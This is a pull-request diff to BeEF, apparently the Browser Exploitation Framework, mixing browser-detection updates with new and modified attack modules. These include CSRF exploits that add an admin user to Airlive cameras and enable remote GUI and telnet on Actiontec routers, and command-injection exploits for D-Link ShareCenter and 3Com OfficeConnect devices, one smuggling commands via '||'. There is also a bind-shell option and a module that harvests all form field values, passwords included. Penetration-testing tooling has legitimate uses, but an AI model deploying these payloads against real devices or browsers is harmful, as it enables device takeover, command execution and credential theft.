Merge pull request #916 from bmantra/master

added option to use only LF in the bind shell module for use with Linux

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.5-alpha
+0.4.4.6-alpha

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.5-alpha'
+    version: '0.4.4.6-alpha'
     debug: false
 
     restrictions:

core/filters/browser.rb

@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/main/client/browser.js

@@ -19,6 +19,22 @@ beef.browser = {
         return navigator.userAgent;
     },
 
+    /**
+     * Returns true if Avant Browser.
+     * @example: beef.browser.isA()
+     */
+    isA:function () {
+        return window.navigator.userAgent.match(/Avant TriCore/) != null;
+    },
+
+    /**
+     * Returns true if Iceweasel.
+     * @example: beef.browser.isI()
+     */
+    isI:function () {
+        return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
+    },
+
     /**
      * Returns true if IE6.
      * @example: beef.browser.isIE6()
@@ -404,6 +420,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 19.
+     * @example: beef.browser.isC19iOS()
+     */
+    isC19iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 20.
      * @example: beef.browser.isC20()
@@ -412,6 +436,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 20.
+     * @example: beef.browser.isC20iOS()
+     */
+    isC20iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 21.
      * @example: beef.browser.isC21()
@@ -420,6 +452,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 21.
+     * @example: beef.browser.isC21iOS()
+     */
+    isC21iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 22.
      * @example: beef.browser.isC22()
@@ -428,6 +468,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 22.
+     * @example: beef.browser.isC22iOS()
+     */
+    isC22iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 23.
      * @example: beef.browser.isC23()
@@ -436,6 +484,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 23.
+     * @example: beef.browser.isC23iOS()
+     */
+    isC23iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 24.
      * @example: beef.browser.isC24()
@@ -444,6 +500,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 24.
+     * @example: beef.browser.isC24iOS()
+     */
+    isC24iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 25.
      * @example: beef.browser.isC25()
@@ -452,6 +516,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 25.
+     * @example: beef.browser.isC25iOS()
+     */
+    isC25iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 26.
      * @example: beef.browser.isC26()
@@ -460,12 +532,52 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 26.
+     * @example: beef.browser.isC26iOS()
+     */
+    isC26iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 26) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 27.
+     * @example: beef.browser.isC27()
+     */
+    isC27:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 27.
+     * @example: beef.browser.isC27iOS()
+     */
+    isC27iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 28.
+     * @example: beef.browser.isC28()
+     */
+    isC28:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome for iOS 28.
+     * @example: beef.browser.isC28iOS()
+     */
+    isC28iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS();
     },
 
     /**
@@ -540,13 +652,25 @@ beef.browser = {
             C17:this.isC17(), // Chrome 17
             C18:this.isC18(), // Chrome 18
             C19:this.isC19(), // Chrome 19
+            C19iOS:this.isC19iOS(), // Chrome 19 on iOS
             C20:this.isC20(), // Chrome 20
+            C20iOS:this.isC20iOS(), // Chrome 20 on iOS
             C21:this.isC21(), // Chrome 21
+            C21iOS:this.isC21iOS(), // Chrome 21 on iOS
             C22:this.isC22(), // Chrome 22
+            C22iOS:this.isC22iOS(), // Chrome 22 on iOS
             C23:this.isC23(), // Chrome 23
+            C23iOS:this.isC23iOS(), // Chrome 23 on iOS
             C24:this.isC24(), // Chrome 24
+            C24iOS:this.isC24iOS(), // Chrome 24 on iOS
             C25:this.isC25(), // Chrome 25
+            C25iOS:this.isC25iOS(), // Chrome 25 on iOS
             C26:this.isC26(), // Chrome 26
+            C26iOS:this.isC26iOS(), // Chrome 26 on iOS
+            C27:this.isC27(), // Chrome 27
+            C27iOS:this.isC27iOS(), // Chrome 27 on iOS
+            C28:this.isC28(), // Chrome 28
+            C28iOS:this.isC28iOS(), // Chrome 28 on iOS
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -662,34 +786,82 @@ beef.browser = {
             return '19'
         }
         ;	// Chrome 19
+        if (this.isC19iOS()) {
+            return '19'
+        }
+        ;   // Chrome 19 for iOS
         if (this.isC20()) {
             return '20'
         }
         ;	// Chrome 20
+        if (this.isC20iOS()) {
+            return '20'
+        }
+        ;   // Chrome 20 for iOS
         if (this.isC21()) {
             return '21'
         }
         ;	// Chrome 21
+        if (this.isC21iOS()) {
+            return '21'
+        }
+        ;   // Chrome 21 for iOS
         if (this.isC22()) {
             return '22'
         }
         ;    // Chrome 22
+        if (this.isC22iOS()) {
+            return '22'
+        }
+        ;   // Chrome 22 for iOS
         if (this.isC23()) {
             return '23'
         }
         ;    // Chrome 23
+        if (this.isC23iOS()) {
+            return '23'
+        }
+        ;   // Chrome 23 for iOS
         if (this.isC24()) {
             return '24'
         }
         ;    // Chrome 24
+        if (this.isC24iOS()) {
+            return '24'
+        }
+        ;   // Chrome 24 for iOS
         if (this.isC25()) {
             return '25'
         }
         ;    // Chrome 25
+        if (this.isC25iOS()) {
+            return '25'
+        }
+        ;   // Chrome 25 for iOS
         if (this.isC26()) {
             return '26'
         }
         ;    // Chrome 26
+        if (this.isC26iOS()) {
+            return '26'
+        }
+        ;   // Chrome 26 for iOS
+        if (this.isC27()) {
+            return '27'
+        }
+        ;    // Chrome 27
+        if (this.isC27iOS()) {
+            return '27'
+        }
+        ;   // Chrome 27 for iOS
+        if (this.isC28()) {
+            return '28'
+        }
+        ;    // Chrome 28
+        if (this.isC28iOS()) {
+            return '28'
+        }
+        ;   // Chrome 28 for iOS
         if (this.isFF2()) {
             return '2'
         }

core/main/constants/hardware.rb

@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/models/browserdetails.rb

@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end

modules/browser/avant_steal_history/command.js

@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
 
-	
+	if (!beef.browser.isA()) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+		return;
+	}
 
 	var avant_iframe = document.createElement("iframe");
 	//var avant_iframe = beef.dom.createInvisibleIframe();
-	avant_iframe.setAttribute('src', "browser:home");
-	avant_iframe.setAttribute('name','test2');
-	avant_iframe.setAttribute('width','0');
-	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('src',      'browser:home');
+	avant_iframe.setAttribute('name',     'avant_history_<%= @command_id %>');
+	avant_iframe.setAttribute('width',    '0');
+	avant_iframe.setAttribute('heigth',   '0');
 	avant_iframe.setAttribute('scrolling','no');
+	avant_iframe.setAttribute('style',    'display:none');
 
 	document.body.appendChild(avant_iframe);
 
 	var vstr = {value: ""};
 
-	if(window['test2'].navigator) {
-	//This works if FF is the rendering engine
-	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+	if (window['avant_history_<%= @command_id %>'].navigator) {
+		//This works if FF is the rendering engine
+		window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+	} else {
+		// this works if Chrome is the rendering engine
+		//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 	}
-	else {
-	// this works if Chrome is the rendering engine
-	//window['test2'].AFRunCommand(60003, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
-
-	}
-	
-
-	
-
-	
 
 });
 

modules/browser/avant_steal_history/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited URLs (Avant Browser)"
-            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
             authors: ["Roberto Suggi Liverani"]
             target:
-                working: ["ALL"]
+                working: ["FF"]

modules/browser/detect_office/command.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+            var ma = 1;
+            var mb = 1;
+            var mc = 1;
+            var md = 1;
+            try {
+                ma = new ActiveXObject("SharePoint.OpenDocuments.4")
+            } catch (e) {}
+            try {
+                mb = new ActiveXObject("SharePoint.OpenDocuments.3")
+            } catch (e) {}
+            try {
+                mc = new ActiveXObject("SharePoint.OpenDocuments.2")
+            } catch (e) {}
+            try {
+                md = new ActiveXObject("SharePoint.OpenDocuments.1")
+            } catch (e) {}
+            var a = typeof ma;
+            var b = typeof mb;
+            var c = typeof mc;
+            var d = typeof md;
+            var key = "No Office Found";
+            if (a == "object" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2010"
+            }
+            if (a == "number" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2007"
+            }
+            if (a == "number" && b == "number" && c == "object" && d == "object") {
+                key = "Office 2003"
+            }
+            if (a == "number" && b == "number" && c == "number" && d == "object") {
+                key = "Office Xp"
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
+
+});
+

modules/browser/detect_office/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_office:
+            enable: true
+            category: "Browser"
+            name: "Detect MS Office"
+            description: "This module detect the version of MS Office if installed"
+            authors: ["nbblrr"]
+            target:
+                working: ["IE"]
+                not_working: ["All"]

modules/browser/detect_office/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_office < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['office'] = @datastore['office']
+		save content
+	end
+
+end

modules/browser/hooked_domain/get_form_values/command.js

@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var form_data = new Array();
+
+	// loop through all forms
+	for (var f=0; f < document.forms.length; f++) {
+		// store type,name,value for all input fields
+		for (var i=0; i < document.forms[f].elements.length; i++) {
+			form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
+		}
+	}
+
+	// return form data
+	if (form_data.length) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
+	// return if no input fields were found
+	} else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
+	}
+
+});
+

modules/browser/hooked_domain/get_form_values/config.yaml

@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        zenoss_daemon_csrf:
+        get_form_values:
             enable: true
-            category: "Exploits"
-            name: "Zenoss 3.x Daemon CSRF"
-            description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
+            category: ["Browser", "Hooked Domain"]
+            name: "Get Form Values"
+            description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]

modules/browser/hooked_domain/get_form_values/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_form_values < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['form_data'] = @datastore['form_data']
+		save content
+	end
+
+end

modules/exploits/beefbind/beef_bind_shell/command.js

@@ -9,6 +9,7 @@ beef.execute(function () {
     var rport = '<%= @rport %>';
     var path = '<%= @path %>';
     var cmd = '<%= @cmd %>';
+    var shellcode ='<%= @shellcode %>';
 
     var uri = "http://" + rhost + ":" + rport + path;
 
@@ -73,7 +74,11 @@ beef.execute(function () {
         };
         xhr.open("POST", uri, false);
         xhr.setRequestHeader("Content-Type", "text/plain");
-        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+	if (shellcode == 'Linux'){
+            command = "cmd=" + command + "\n"; // very important only LF
+        }else{
+            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        }
         xhr.send(command);
         setTimeout("get_additional_cmd_results()",500);
     };

modules/exploits/beefbind/beef_bind_shell/module.rb

@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
       { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
       { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
       { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
-      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
+      { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
+          'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
+          'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
+        }
 		]
 	end
 

modules/exploits/camera/airlive_ip_camera_csrf/command.js

@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base  = '<%= @base %>'; 
+  var path  = 'cgi-bin/admin/usrgrp.cgi';
+  var user  = '<%= @user %>';
+  var pass  = '<%= @pass %>';
+
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+    [{'type':'hidden', 'name':'user',     'value':user},
+     {'type':'hidden', 'name':'pwd',      'value':pass},
+     {'type':'hidden', 'name':'grp',      'value':'administrator'},
+     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
+     {'type':'hidden', 'name':'action',   'value':'add'},
+     {'type':'hidden', 'name':'redirect', 'value':''}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/camera/airlive_ip_camera_csrf/config.yaml

@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# For more information see:
+# http://www.exploit-db.com/exploits/26174/
+##
+beef:
+    module:
+        airlive_add_user_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Airlive Add User CSRF"
+            description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
+            authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
+            target:
+                unknown: ["ALL"]

modules/exploits/camera/airlive_ip_camera_csrf/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Airlive_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root',  'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
+			{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js

@@ -0,0 +1,27 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var path    = '/cgi-bin/system_mgr.cgi';
+	var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	var timeout = 15;
+
+	var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+		{'type':'hidden', 'name':'cmd',      'value':'cgi_sms_test'},
+		{'type':'hidden', 'name':'command1', 'value':cmd}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/nas/dlink_sharecenter_cmd_exec/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        dlink_sharecenter_cmd_exec:
+            enable: true
+            category: ["Exploits", "NAS"]
+            name: "D-Link ShareCenter Command Execution"
+            description: "Attempts to execute arbitrary commands on a D-Link ShareCenter NAS. Multiple models are affected, including DNS-320 and DNS-325, however this module has not been tested.<br/><br/>For more information see, http://blog.emaze.net/2012_02_01_archive.html"
+            authors: ["bcoles", "Roberto Paleari, Emaze Networks S.p.A."]
+            target:
+                working: ["ALL"]

modules/exploits/nas/dlink_sharecenter_cmd_exec/module.rb

@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+###
+# This module has not been tested. For more information see:
+# http://blog.emaze.net/2012_02_01_archive.html
+# http://www.securityfocus.com/archive/1/521532
+###
+class Dlink_sharecenter_cmd_exec < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name'=>'base', 'ui_label'=>'Router web root', 'value'=>'http://192.168.0.1/'},
+			{'name'=>'cmd',  'ui_label'=>'Command',         'value'=>'ls'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/php-5.3.9-dos/module.rb

@@ -14,7 +14,7 @@ class Php_dos < BeEF::Core::Command
 	def post_execute
 		content = {}
 		content['result'] = @datastore['result'] if not @datastore['result'].nil?
-		content['fail]    = @datastore['fail']   if not @datastore['fail'].nil?
+		content['fail']    = @datastore['fail']   if not @datastore['fail'].nil?
 		save content
 	end
 

modules/exploits/router/3com_officeconnect_cmd_exec/command.js

@@ -9,8 +9,9 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var path    = 'utility.cgi';
 	var cmd     = '<%= @cmd %>';
+	var timeout = 15;
 
-	var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+	var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
 		{'type':'hidden', 'name':'testType', 'value':'1'},
 		{'type':'hidden', 'name':'IP',       'value':'||'+cmd}
 	]);
@@ -18,9 +19,9 @@ beef.execute(function() {
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(com_officeconnect_iframe);
+		document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 

modules/exploits/router/actiontec_q1000_csrf/command.js

@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var user    = '<%= @user %>';
+	var passwd  = '<%= @password %>';
+	var port    = '<%= @port %>';
+	var timeout = 15;
+
+	var actiontec_q1000_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotegui.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlHttp',          'value':'1'},
+		{'type':'hidden', 'name':'adminUserName',       'value':user},
+		{'type':'hidden', 'name':'adminPassword',       'value':passwd},
+		{'type':'hidden', 'name':'remGuiTimeout',       'value':'0'},
+		{'type':'hidden', 'name':'remGuiPort',          'value':port}
+	]);
+
+	var actiontec_q1000_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "advancedsetup_remotetelnet.cgi", "POST", [
+		{'type':'hidden', 'name':'serCtlTelnet',        'value':'1'},
+		{'type':'hidden', 'name':'remTelUser',          'value':user},
+		{'type':'hidden', 'name':'remTelPass',          'value':passwd},
+		{'type':'hidden', 'name':'remTelTimeout',       'value':'0'},
